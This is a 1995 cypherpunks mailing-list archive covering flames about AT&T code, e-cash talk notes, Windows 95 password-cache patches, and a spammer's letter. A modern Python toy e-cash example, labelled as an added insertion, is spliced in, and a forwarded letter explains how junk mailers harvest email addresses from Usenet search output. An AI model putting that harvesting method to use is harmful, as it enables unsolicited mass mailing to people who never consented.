Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org>
Message-ID: <199512200009.TAA17192@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't normally like to respond to anonymous kooks, but...

cpunk@remail.ecafe.org (ECafe Anonymous Remailer) writes:
> AT&T Spokesman Matt Blaze writes:
> blah blah
> >There are (basically) no restrictions on the use or distribution
> >of the (very simple) code.
> 
> This is simply untrue. Read the fine print in the file. Use this code
> and you owe them big. They'll "reach out and touch" you big time.
> If they were serious, they'd gpl it.
> 

Since I don't understand what you're talking about, I can't really
respond to it.  The only restrictions on the use of this code are that
you have to acknowledge where it came from and that it comes with no
warranty.  You also have to keep the notice in place on any copies you give
to anyone else.  Just like the GPL, only without the nutty requirement
that you also give away your own source code.

> >Get it from:
> >	ftp://research.att.com/dist/mab/quantize.shar
> >
> >The quantize package is also part of Jack Lacy's cryptolib package
> >(watch this space for details).
> 
> I don't understand why this group continues to tolerate these blatantly
> commercial messages from att (and netscape.) (The message is
> really just an ad for the cryptolib product, as it says). I've also said
> this b4 but I'll say it again: why would anyone in their right mind trust
> binary code from att after the clipper fiasco.

I think you're confused.  AT&T Bell Labs Research (which is soon to be
split into two parts, Bell Labs and AT&T Labs, owned by two different
companies starting next year) is a research laboratory.  A lot of very
good cryptology and security people work here.  While AT&T (the
parent company) is in the products and services business, AT&T Bell Labs
doesn't sell any products or services itself.  Like most of the
computer science researchers in Bell Labs (and like those in universities
and elsewhere), I publish the results of most of the work that I do (modulo
some consulting I do for the moneymaking part of the company in order
to "pay the rent").  I (like many other researchers) also sometimes create
software in the course of my work.  When this might be of use to others,
I prefer to give it away rather than let it sit idle on my disk.  The
quantization code (like CFS, swIPe and others) is an example.  CryptoLib
is another example; it was created by my colleague Jack Lacy.  We give that
away, too.  Bell Labs doesn't advertise anything.  We don't have retail 
customers.  Our research software is unconnected with AT&T's commercial
activities.  We make it available because that's what members of the research 
community do.  Its distribution is neither purely altruistic nor especially
mercenary.  If you really like our research software, I guess you can switch
your long distance service to AT&T or buy an AT&T answering machine or
something.  But that part of the company is very remote from my food chain.
I'm from the part of the company that _spends_ money.  Other parts _make_
the money.

> And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
> cypherpunks, when they are so clearly just working us for their
> corporate interests?

Again, I think you're confused.  Jeff Weinstein works for Netscape, not
AT&T.  I think there's a connection between AT&T and Netscape somewhere
(like we bundle netscape with worldnet service), but I don't really
know the details.

> I wonder how much they get paid to monitor this list?

I can't speak for Jeff Weinstein, but in my case, not nearly enough.

-matt
"I'm from The Phone Company and I'm here to help you."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 19 Dec 95 17:49:53 PST
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org>
Message-ID: <Pine.SUN.3.91.951219193924.5644A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Dec 1995, ECafe Anonymous Remailer wrote:

> I don't understand why this group continues to tolerate these blatantly
> commercial messages from att (and netscape.) (The message is
> really just an ad for the cryptolib product, as it says). I've also said
> this b4 but I'll say it again: why would anyone in their right mind trust
> binary code from att after the clipper fiasco.
> 

I don't understand why this group continues to tolerate these completely
stupid messages from Mr. Anonymous (and other nuts.) (The message is
really just a llame by Detweller (sp?), as it indicates). I've also said
this b4 but I'll say it again: why would anyone in their right mind pay any
attention to an anonymous idiot without enough face to get a nym.

> And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves
> cypherpunks, when they are so clearly just working us for their
> corporate interests? I wonder how much they get paid to monitor this
> list?
> 
> 

You might want to have a doctor help you take your head out of your ass.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 19 Dec 95 17:08:15 PST
To: dcsb@ai.mit.edu
Subject: King Kong Does e$
Message-ID: <v02120d03acfd0a819ff2@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

King Kong Does e$

A while back, when the Microsoft Network hype was at its height, I
forwarded a bunch of articles to www-buyinfo entitled "Oh, No, there
goes Tokyo", about how Godzilla, in the form of Microsoft's Microsoft
Network, was going to stomp all over Tokyo, in the form of the net.
This was before I found out that Netscape's codeword for their Navigator
HTML Browser was "Mozilla".

So, along comes the following on the DCSB list, courtesy of the esteemed
Mr. Lethin:

        Wednesday,  December 13, 1995
        Refreshments 4:15 PM 4:30 - 6:00 PM
        Bartos Theater, E15-070 MIT Media Lab
        Ames Street, Cambridge, MA, USA
        Electronic Money Made Easy
        Dan Simon
        (dansimon@microsoft.com)


Mac in hand, I went to a presentation at the Media Lab's basement
auditorium, and proceeded to transcribe his copious overheads, sans
graphics, as fast as my fingers could fly...

Which I present here in its raw form, with a few corrections, his
cryptic (ahem...) source citations, viz: (cf., MN 93), and the
occasional note I could cram in when he stopped flipping charts...

Oh, no, there goes Zurich...

- --------------------

Dan Simon Microsoft, now,
Quantum Computing/crypto in Canada before...

Characteristics of cash
        Portable
        Anonymous
        Confidential
        Easily and instantly transferable
        Owned by those possessing it
        Hard to counterfeit
        Has multiple interchangeable forms.

What isn't cash: e-credit
        Non-anonymous
        Severely limited confidentiality
        Complicated payment protocols two parties and both their respective
        banks involved
        Ownership determined by record-keeping credit/debit authority

What isn't e-cash: offline e-cash
        One desirable feature of cash: transfer without an intermediary
        Problem: doublespending: restore prespending state, respend the same
        cash
        Tracing re-spent cash useless if it was stolen (cf. (cfnII 0091, Yac94,
        etc)
        Tamperproof hardware isn't (cf EGY83)
        Can broadcast small amounts over the net at a huge payoff. Result cash
        as secure cellphone codes (better not be worth much...)

Offline Electronic "bills" don't work. Too big for offline
Offline Electronic coins do work. Easy to counterfeit, not much profit.

(He is interested in electronic banknotes, on-line bearer securities, in
other words)

What can we assume:

        Customers, merchants, banks may wish to transact via many different
        possible media: telephone, Internet, cable network,
        smartcard/terminal, etc. etc.

        If a customer wants a transaction to be anonymous, then an anonymous
        medium must be used (no callerid on the telephone, anonymous remailer,
        etc)

A Modest Proposal
        On-line cash issued by banks owned by a possessor,
        Cryptographically hard to counterfeit
        Cash ownership transferred with bank's help
        Anonymity of payer, payee based on anonymity of communication medium
        No individual account or prior trust relationship necessary to use a
        bank's cash
        (cf., MN 93)

Formal Security
        E-cash schemes generally described as a set of individual protocols
        (payer-payee, payer-bank, etc.) with intuitively described goals
        But formal proof of security really requires a model of a full network,
        to consider general attacks, and explicit, formal security goals
        Previous examples:
        (BEA91/MR/91) for computation
        (RS93) for anonymity,
        (BR93) for authentication

What does it look like
        A bank issued banknote has a serial number, amount, and treasurer's
        signature
        It also has an associated "secret" which can be checked against the
        serial number, but can't be gotten from the serial number
        Its owner is whoever has the secret...
        ...but when the issuing bank gets the secret, the banknote is no longer
        valid.
        Publish the bank notes as broken, banknotes no longer valid.

(spiffy graphic elided)

        Customer chooses secret s, serial number n, n=h(s) and amount.
        Customer pays bank (by any method) the amount of the desired banknote
        bank signs serial number and amount
        Transaction may be anonymous (physical cash purchase at bank) pick
        serial number, bank uses private signature to sign the serial number.

(May's  train-locker applies)

How is change made:
        Customer generates secrets, serial numbers and amounts for smaller
        banknotes
        Customer gives bank the secret for the large banknote, and serial
        numbers and amounts for smaller ones
        Bank signs serial numbers and amounts, stores the secret for large
        now-invalid banknote
        Transaction can be completely anonymous.

How is it used for payment
        Payer simply gives bank note to payee by handing over the secret
        payee immediately exchanges the banknote for new ones anonymously, if
        desired
        Old banknote is now invalid, since bank has its secret; hence payer
        can't respend it
        If the bank note is already invalid, bank rejects exchange and informs
        payee.
        "In effect, these are disposable banknotes"

"the simple way to get around exploding banknote numbers, issue it with
an expiry date."

Estimated outstanding certificates numbers would then be within the
storage capacity of a bank. (per a crony in the Bank of Japan)

Public key from the bank is needed to keep the bank honest.

"miracle of one-way function" (shuts down clueless question...)

Model
        Synchronous network of parties, some dishonest, one of them is the
        bank
        Parties can exchange messages anonymously
        Responder can always broadcast
        Parties and bank keep track of balances each round, a party receives
        instruction to deposit/withdraw a unit value coin to/from the bank or
        pay a coin to another party
        (missed one point..)

Security goals
        Correctness: if all parties are honest, then instructions result in
        correct new balances
        Integrity: parties cannot be ripped off
        Honest bank never accepts more coins than have been withdrawn
        Party can detect dishonest bank
        Anonymity: information available to any coalition should be
        indistinguishable for any sequence of instructions consistent with the
        starting and ending points of distinguished coins entering/leaving
        coalition
        Weak anonymity, contends that that's what we have with serial numbered
        physical notes anyway
        Can make stronger with subsequent anonymous change operations at a
        bank...
        (can also buy with cash at a desk, also on the net with another form of
        digital cash ;-)
        Efficiency: cost of security should grow slowly (polylog at worst) with
        size of network.

Convenience Features
        Only payer, payee, issuing bank involved in transaction
        Each validation and transfer immediate
        Portable
        Easy to handle
        Expiry dates can be added.
        If anonymous withdrawal, then can get lost money back on expiry date, if
        coins weren't cashed.

Security
        Digital signature makes cash unforgeable
        Online validation prevents double spending
        Secrecy of secret preserved even if serial number publicly available
        Bank's *only* secret is its private signature key
        Digital signature publicly commits bank to redeeming its e-cash; hence
        customers need not have special trust relationship with bank.

Audience Q: Borenstein's scenario.
A: bad problem. someone can split bank private keys, for instance
(No problem, strawman, what happens when someone breaks Ft. Knox?... --RAH ;-)

Extra features
        Payee can have the e-cash non-anonymously deposited in bank account for
        easier handling and better security (bank as back up)
        Payer can include transaction details with payment package or hide them
        in the secret (to create transaction record to be archived by, for
        example, by the bank) helpful in dispute.

"Secure payments" and E-cash
        "Don't send cash in the mail" even if it gets there, receiver need not
        admit it
        One solution: secure payment protocols (Microsoft/Visa STT)
        Non-anonymous: transaction details attached to payment mediated by
        payer's credit card issuer
        Payee can delay response and batch process transactions

"Secure Payments"
        Protocol's basic idea: payer sends encrypted package to payee giving
        credit card number and transaction details, "payment instructions".
        Only acquirer can read it
        Valid credit card number plus payer's digital signature assure
        acquirer that payment is legitimate
        (missed one point)

Secure ecash payments
        Payer substitutes ecash secrets for credit card number in payment
        instruction package payment desiring ecash settlement.
        Includes ecash serial numbers amounts when sending package to acquirer
        E-cash issuing bank checks validity of ecash payment and exchanges
        it for merchant as appropriate by signing serial numbers, amounts
        Instant payment, no bad debt


Questions
        Where is the communications cost/ security tradeoff?
        Solutions to dine and dash problem with dishonest bank (anonymity must
        be broken to nark on the bank) (cf Cle85)?
        Efficient offline anonymous micropayments solutions?
        Implementation pitfalls?

- -------------------

So, there are my notes, such as they are...

I walked away from this thinking that on-line cash covers a multitude of
sins:

        You can stick any "secret" into digital cash as long as it's unique
        and you trust the bank to keep it.

        If bank signs the secret they've shared with you and reveal it
        before some expiry date, they can be put out of business, because
        they've blown their reputation.

        If they claim that you've not shared a secret, you expose the secret
        and their signature, same happens.

        If you put an expiry date on Simon's digital cash, you don't have
        to keep track of it all.

        If you have an expiry date on Simon's cash, if you lose it, you
        can tell the bank, and if it's not cashed by the expiry date they
        can give you your money back.

        There's a distinction between on-line "banknotes", which are
        valuable enough to forge, and off-line "coins", which are not.

Simon has a system which has just enough anonymity to be economically
useful, but not perfect enough to keep the truly paranoid happy. Must be
something in the water in Redmond. Essentially, the bank becomes a
quasi-anonymous "line" in what's normally a peer-to-peer transaction.
Takes getting used to.

He's got a web page with all of this in gory detail, I bet, and his
e-mail address is at the top of this post.



Speaking of micropayments, Mark Manasse, Ron Rivest, Adi Shamir, and
Silvio Micali did another talk on Friday which touched on several cool
micropayment schemes, and a much more cost-effective way to do key
revocation. Though I got there exactly 6 minutes late, I missed one
presentation, and didn't take any notes for the rest. Hope someone else
here did. I saw lots of DCSB/Cypherpunks there... Any takers?

Cheers,

Bob Hettinga







-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<
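
The banknote life cycle from the talk notes above (n = h(s), bank signs serial number and amount, change-making, payment by handing over the secret, rejection of a respent note), as an added example that is not part of the original post and not Simon's or Microsoft's code. Assumptions: SHA-256 as the one-way function, a toy textbook-RSA bank key built from two Mersenne primes, and hypothetical names throughout.

```python
import hashlib
import secrets

# Toy bank signing key (constructed; textbook RSA over a hash). It stands in
# for "the bank's private signature key", the bank's only secret in the notes.
P, Q = 2**107 - 1, 2**61 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def h(secret: bytes) -> bytes:
    """One-way function from the notes: serial number n = h(s)."""
    return hashlib.sha256(secret).digest()


def note_digest(serial: bytes, amount: int) -> int:
    data = serial + amount.to_bytes(8, "big")
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N


def verify_note(serial: bytes, amount: int, sig: int) -> bool:
    """Runs with the public key (N, E) only, so anyone can check the bank."""
    return pow(sig, E, N) == note_digest(serial, amount)


class Bank:
    def __init__(self):
        self.revealed = {}      # serial -> secret, one entry per dead note

    def issue(self, serial: bytes, amount: int) -> int:
        """Customer has paid `amount` by any method; sign (serial, amount)."""
        return pow(note_digest(serial, amount), D, N)

    def exchange(self, secret, amount, sig, wanted):
        """Trade one note for new ones; `wanted` is [(serial, amount), ...]."""
        serial = h(secret)
        if not verify_note(serial, amount, sig):
            raise ValueError("not a note from this bank")
        if serial in self.revealed:
            raise ValueError("note already invalid")
        if any(a <= 0 for _, a in wanted) or sum(a for _, a in wanted) != amount:
            raise ValueError("amounts do not add up")
        self.revealed[serial] = secret          # the old note dies here
        return [self.issue(n, a) for n, a in wanted]


def fresh(amount: int) -> dict:
    """Holder side: pick a new secret and derive its serial number."""
    secret = secrets.token_bytes(32)
    return {"secret": secret, "serial": h(secret), "amount": amount}


def scenario() -> dict:
    bank = Bank()
    big = fresh(10)                             # Alice buys a 10-unit note
    big["sig"] = bank.issue(big["serial"], 10)

    # Making change: reveal the big note's secret, get 7 + 3 signed.
    seven, three = fresh(7), fresh(3)
    seven["sig"], three["sig"] = bank.exchange(
        big["secret"], 10, big["sig"],
        [(seven["serial"], 7), (three["serial"], 3)])

    # Payment: Alice hands Bob the secret and signature of the 7-unit note.
    # Bob exchanges it at once for a note whose secret only he knows.
    bobs = fresh(7)
    bobs["sig"] = bank.exchange(seven["secret"], 7, seven["sig"],
                                [(bobs["serial"], 7)])[0]

    # Alice still holds the old secret and tries to spend it a second time.
    try:
        bank.exchange(seven["secret"], 7, seven["sig"], [(fresh(7)["serial"], 7)])
        respend = "accepted"
    except ValueError as err:
        respend = str(err)

    return {
        "respend": respend,
        "bob_note_verifies": verify_note(bobs["serial"], 7, bobs["sig"]),
        # The dead note's signature is still good; only the online check
        # against the bank's revealed-secret list stops the respend.
        "dead_note_signature_still_verifies":
            verify_note(seven["serial"], 7, seven["sig"]),
        "bank_knows_bobs_secret": bobs["secret"] in bank.revealed.values(),
        "dead_notes_at_bank": len(bank.revealed),
    }


if __name__ == "__main__":
    for key, value in scenario().items():
        print(f"{key}: {value}")
```
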






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 19 Dec 95 16:45:46 PST
To: perry@piermont.com
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com>
Message-ID: <199512200051.TAA17476@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry wonders:

> What I want to know is, why are you doing this? Are you trying to
> start a flame war? Are you just an asshole? Are you Detweiler? What's
> the motive?

I must admit I don't quite get it, although I think there are people
who really can't distinguish between a person and a person's employer, and
who believe that the entire world is a black-and-white battle between
good and evil.

Jeff Weinstein got treated rudely back during the feeding frenzy
where everyone hated Netscape because he works for Netscape.

Brian Davis got treated rudely when he first joined the list because
he works for the government as a federal (?) prosecutor.

I get treated rudely from time to time because I work for AT&T.

It doesn't bother me, especially when it comes from an anonymous source who
for all we know might earn his or her keep by advertising the joys of
smoking cigarettes to small children or by testing the toxic effects of
new cosmetics on cute, furry animals.  I figure it all just comes with
the turf.  At least I don't get blood thrown on me by protestors the way
people who work in animal testing labs do...

-matt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 19 Dec 95 18:30:57 PST
To: jirib@cs.monash.edu.au
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <acfcb5260c0210047aff@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:22 AM 12/20/95, Jiri Baum wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hello,
>
>tcmay wrote:
>...
>> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
>> has two factors.)
>...
>
>Can someone enlighten me as to what the two factors are?
>
>With sensible definitions I've heard you either get one (just itself)
>or four (itself [p], both units [1,-1] and the co-whatsitsname [-p]).


You're looking too deeply. My point was in response to the very common
error people make in talking about "factoring a large prime number." A
prime is actually easy to factor: itself and 1, which is the point I was
making.

(One can quibble about whether 1 is a factor...I include it, though 1 is
admittedly not considered a prime. But this is a quibble, I think.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 19 Dec 95 20:07:51 PST
To: cypherpunks@toad.com
Subject: Update on Microsoft .PWL and SMB Spin Control
In-Reply-To: <c=US%a=_%p=msft%l=RED-72-MSG951211115528QX007C00@red-01-msg.itg.microsoft.com>
Message-ID: <Pine.ULT.3.91.951219193256.8207C@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I was thinking about copying this to Yves and Yusuf, but I figure it 
will get to them anyway.

The WinNews #22 mass mailing (by the way, there seems to have been no
#21) has this to say about the .PWL bug: 

 NEW POSTINGS TO WINDOWS 95 WEB SITE AND FORUMS 

  * Under "WINDOWS 95 SOFTWARE LIBRARY"
      * In "Windows 95 Updates"
  
          - "Enhanced Password Cache Security Update" - an 
  enhanced security component that substantially strengthens
  the encryption used for the Microsoft Windows 95 password
  cache.

The update comes with no ReadMe -- it's a self-contained installer only.
No details on how it works appear to be available anywhere. There seems
to be no way to ensure that you have received a patch without viruses or
other modifications. I will not recommend or distribute this archive to
anyone until these problems are fixed. 

I also just noticed how WinNews #19 was censored:

 Free Software

  "Updated Drivers for Windows 95 File and Printer Sharing" - has a single 
  readme. The files are self-extracting executables located at: 
  FreeSoftware|Windows 95 Updates

The correct name for this page and patch is "Updated Drivers for Windows
95 File and Printer Sharing Security Issue." WinNews gave no indication
what this patch did. 

A "WinNews Special Issue" with some details on the SMB bug (including
incorrect information that has been quietly corrected, but not retracted
on WinNews or elsewhere) was sent to at least some WinNews subscribers in
late October. This "Special Issue" is not archived on Microsoft's Web
site, however -- it's the only issue that isn't. 

One month, ten days after the Windows 95 Product Manager assured me that
they would be made available "within two weeks," there are still no
international versions of the SMB or C$ security patches available on
Microsoft's Web site. All non-English copies of Win95 are still
vulnerable. 

Most of the major PC magazines are going to carry something on the SMB 
and .PWL bugs next month. Windows Magazine's story is going to be 
unambiguously positive:

  In response to a posting on the Internet questioning the security of
  Windows 95's optional password caching feature, Microsoft immediately 
  recommended that concerned users turn off password caching. Microsoft
  has now released a free update to Windows 95 that substantially 
  increases security.

- -rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 19 Dec 95 17:28:54 PST
To: rah@shipwright.com
Subject: Re:  King Kong Does e$
Message-ID: <9512200125.AA06259@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Speaking of micropayments, Mark Manasse, Ron Rivest, Adi Shamir, and
>Silvio Micali did another talk on Friday which touched on several cool
>micropayment schemes, and a much more cost-effective way to do key
>revocation. Though I got there exactly 6 minutes late, I missed one
>presentation, and didn't take any notes for the rest. Hope someone else
>here did. I saw lots of DCSB/Cypherpunks there... Any takers?

A reference for Mark's paper on Millicent is
    <a href="http://www.w3.org/pub/Conferences/WWW4/Papers/246/">The Millicent
	Protocol for Inexpensive Electronic Commerce</a>
Of all the various payment protocols I've seen, this was one of the few
that studied the available protocol bandwidth before designing a protocol.
Folks with an engineering slant should appreciate the work here.

I would be VERY interested in URL's and summaries of Micali's talk.
(I really wanted to go but after spending most of the week at the WWW4
conference I had to commit serious time to being anchored to the office.)
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Tue, 19 Dec 95 17:44:21 PST
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <199512200022.LAA28002@sweeney.cs.monash.edu.au>
Message-ID: <Pine.A32.3.91.951219204204.34882E-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Jiri Baum wrote:

...
> Can someone enlighten me as to what the two factors are?
...
In this country, children are taught that prime numbers indeed have two 
factors: 1 and themselves.  I suspect it's a cultural difference.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Want to give a soon-to-be college grad a job?         Mail me for a resume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 19 Dec 95 21:08:53 PST
To: cypherpunks@toad.com
Subject: (fwd) Junk email address collection (from a junk emailer)
Message-ID: <Pine.ULT.3.91.951219210009.8207F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Personally, I think anyone who uses dejanews as a way to grep Usenet is
an idiot, but since this idiot actually did spend several hours doing so,
and then sent unsolicited commercial email to several thousand people,
it's worth listening to him. 

Of course he's wrong about DejaNews having anything to do with Stanford.
Anyone know anyone there?

This guy is obviously afraid of me. It's a pretty funny story, actually. 
Too bad I can't tell it to anyone.

- -rich

- ---------- Forwarded message ----------
From: Name Witheld by Request
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Important info for you

Rich,

There is one more point I would like to make to you.  Since you have
recently responded in a sincere way regarding everything I have asked you
about, I would like to return the favor and suggest some things that might
be of help to you and your cause.

If you want to put a damper on some of the random unsolicited emailings to
newsgroups members, I would like to tell you how.

I have done extensive marketing research online, and I am very involved
with Internet commerce and everything that affects it.  Just like you have
your "circles" of associates, so do online business people.  I have met a
lot of business users online, and have learned the ins and outs of things
related to Internet commerce and marketing.

Anyway, in these "circles" of discussions, and seeing information and posts
from some of these business people, I have learned many things that your
group is most likely not exposed to.

For example, there is a major resource where the majority of email names
are stripped from, and I would like to reveal it to you, and give you the
solution to putting an end to it.  But only because I truly want to help,
and show you that I am not your enemy.

You may already know some of this.  The "Deja News" Web service (at
Stanford) is one of the major resources that some of these mailers use to
get names.  They attempt to do target marketing by doing searches for
keywords related to their customers, or their own, advertising material
that they wish to send.

They simply do a search for several words like "resumes" if they have
something to do with a resume service, etc.  I'm sure you get the idea.
After they do their search, they merely dump screen after screen of the
search engine's findings and then strip the addresses using a FIND-CONTAINS
"@" command in any database program.  This is how they strip the names to
create a mass email list.

There is ONE way that could really screw over these mailers from using this
resource.  This is inside information that has been revealed to me (I have
also seen references to it somewhere else).  Don't ask who it was that was
telling everyone about it, because I honestly couldn't tell you - I just
know it is going around.

Since you are there at Stanford, I am sure that you may be able to bring
this information to someone working on this project so they can make some
necessary changes.

Here it is:

When one of these mailers goes to do a search (and from what I hear, many
of them do it on regular intervals to get new names) they cannot do a TERSE
search. Why?  Because it cuts off the email addresses if you notice the
output.  They cannot obtain addresses from this data.

So what do they do?  They do a VERBOSE search and this way the email
addresses are completely listed.

Make a change to this VERBOSE search option so that it will only list the
partial email address, and you will eliminate THOUSANDS, if not millions of
unwanted email messages on the Net.

I guarantee if they made this change to the site it would make a HUGE
difference.  From what I hear, most newsreaders only list news post lists
by "author" and not by email address, so these companies cannot easily
strip names through regular newsgroup programs, and must use a service
(like Deja News) to compile large email lists.

Also, you and your buddies may want to look into a guy selling a software
program called "Floodgate."  Apparently this person is selling a program
for about $300 that is designed to strip names from text files that are
created from copying the output of other sources.

Just thought I would donate some helpful information to make up for my offense.

I don't mind if you should share this info with your contacts and if you
tell them that it came from me, however, I would prefer if you would not
post this information or statement publicly.  I do not wish to get involved
with a MAJOR uprising of business people that would murder me for revealing
stuff like this.

If I come across some other stuff which may be of interest to you, I will
let you know.  I think it is much better for us to work together instead of
against one another.

Let me know what you think,

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNeZ3Y3DXUbM57SdAQE/5QP/cwqEiY7eX8fR/9JEPmSdhE63Ax+H+NCw
Uac9VXlKKSH3e+JfI7c/+sWhYafLvWVFlz7Ikj1/uMilAmNJjJTUZfTHqdlYKN/+
kkmc+cCWfGAkl6PFcFqcvSdPKJvyVMsnUFufFBsl629Ot7Pb8yZJTXEq0vr8+BcG
QOdMuhEZiXk=
=Hq1v
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 19 Dec 95 22:00:54 PST
To: "Vinod Valloppillil" <vvallopp@eniac.seas.upenn.edu>
Subject: Re: cyphernomicon FTP site?
Message-ID: <m0tSH6U-00090OC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:18 PM 12/19/95 -0500, you wrote:
>Anyone know where I can FTP a full copy of the cyphernomicon?
>
>------------------------------+-----------------------------------------------
>Vinod Valloppillil            | LibertarianismTelecommunicationsFreeMarketEnvi 
>Engineering/Wharton           | ronmentalismTechnologyCryptographyElectronicCa
>University of Pennsylvania    | shInteractiveTelevisionEconomicsPhilosophyDigi
>vvallopp@eniac.seas.upenn.edu | talPrivacyAnarchoCapitalismRuggedIndividualism
>------------------------------+-----------------------------------------------


I'm interested in this too.  I really HATE those silly HTML documents that
can't (or, at least, I haven't yet figured out how) be downloaded in one
swell foop.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 19 Dec 95 21:50:23 PST
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE
Message-ID: <199512200544.VAA16051@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - December 20, 1995
Contact: Sameer Parekh sameer@c2.org 510-601-9777

COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE 

Community ConneXion today announced a new service for its customers
which will make secure, private electronic commerce more accessible to
all merchants, from the small single-person business to large
corporations trying to sell goods and services over the
world-wide-web.

The new service allows its customers to accept ecash, an anonymous,
secure electronic payment system, developed by DigiCash bv, of
Amsterdam, Holland and implemented with US Dollars by Mark Twain Bank,
of St. Louis, Missouri. Customers can set up web pages on their web
sites and charge websurfers from pennies to dollars per page when
viewing their sites. The technology allows anyone on the Internet to
become a merchant, selling goods and services electronically.

Community ConneXion's President, Sameer Parekh, commented on the new
development, "Before we unveiled this service, it was rather difficult
for a merchant to offer content on the web in exchange for private,
secure payment. Our system allows our customers to add simple
configuration directives to their web pages in order to start charging
for them." Information about Community ConneXion's ecash merchant
support is available on their webserver at http://www.c2.org/ecash/.

Ecash is the only strongly private payment system available on the net
today. "All other consumer payment systems on the net are strongly
linked with the old-fashioned and outdated credit card system," said
Parekh. Ecash provides full payor anonymity and protects against fraud
using strong cryptographic protocols developed by David Chaum,
Managing Director of DigiCash.

"Community ConneXion continues to lead the world toward a more
efficient model of commerce on the Internet" said Frank Trotter, III,
Mark Twain Bank International Markets Division Director and Ecash
project leader.  "Integration of an Ecash payment mechanism into the
site is a giant step toward allowing business and research to function
and support itself efficiently.  We look forward to the continued
leadership in innovation from Community ConneXion."

Community ConneXion has been a supporter of ecash since its inception
in October of 1995, becoming the first internet provider in the world
to start accepting ecash as payment for services, less than one month
after the payment system was announced. 

Community ConneXion, founded in June of 1994, is the leading provider
of privacy on the Internet. They provide anonymous and pseudonymous
internet access and web pages in addition to powerful web services,
virtual hosts, and web design consultation. Information is available
from their web pages at http://www.c2.org/. Information about the Mark
Twain Bank ecash release is available from
http://www.marktwain.com/ecash.html.

DigiCash and ecash are trademarks of DigiCash bv. Mark Twain Bank is a
trademark of Mark Twain Bancshares.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Tue, 19 Dec 95 20:28:21 PST
To: Matt Blaze <mab@crypto.com>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512200051.TAA17476@crypto.com>
Message-ID: <Pine.OSF.3.91.951219222236.16364A-100000@francis.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Matt,

